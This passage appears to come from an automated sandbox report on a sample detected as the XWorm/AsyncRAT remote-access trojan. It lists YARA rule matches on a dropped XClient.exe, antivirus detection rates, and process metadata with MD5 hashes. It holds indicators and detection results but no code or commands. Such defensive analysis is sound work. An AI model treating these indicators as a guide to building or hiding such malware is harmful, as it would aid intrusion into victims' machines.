                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.1156694138.0000000000192000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.1156694138.0000000000192000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
                                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Joe Security
                                                                                  • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: Sekoia.io
                                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\XClient.exe, Author: ditekSHen
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 92%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:08:06:52
                                                                                  Start date:16/03/2025
                                                                                  Path:C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exe" -ServerName:Microsoft.ZuneMusic.AppX48dcrcgzqqdshm3kf61t0cm5e9pyd6h6.mca
                                                                                  Imagebase:0x7ff65a350000
                                                                                  File size:23'140'864 bytes
                                                                                  MD5 hash:F963F75C0AD152437E10D656A00793A3
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:08:06:56
                                                                                  Start date:16/03/2025
                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                  Imagebase:0x7ff6ca680000
                                                                                  File size:55'320 bytes
                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:8
                                                                                  Start time:08:06:56
                                                                                  Start date:16/03/2025
                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                  Imagebase:0x7ff75b8b0000
                                                                                  File size:496'640 bytes
                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:18
                                                                                  Start time:08:07:11
                                                                                  Start date:16/03/2025
                                                                                  Path:C:\Windows\System32\OpenWith.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                                                  Imagebase:0x7ff7a3bd0000
                                                                                  File size:123'984 bytes
                                                                                  MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:19
                                                                                  Start time:08:07:19
                                                                                  Start date:16/03/2025
                                                                                  Path:C:\Windows\System32\OpenWith.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\OpenWith.exe -Embedding
                                                                                  Imagebase:0x7ff7a3bd0000
                                                                                  File size:123'984 bytes
                                                                                  MD5 hash:E4A834784FA08C17D47A1E72429C5109
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >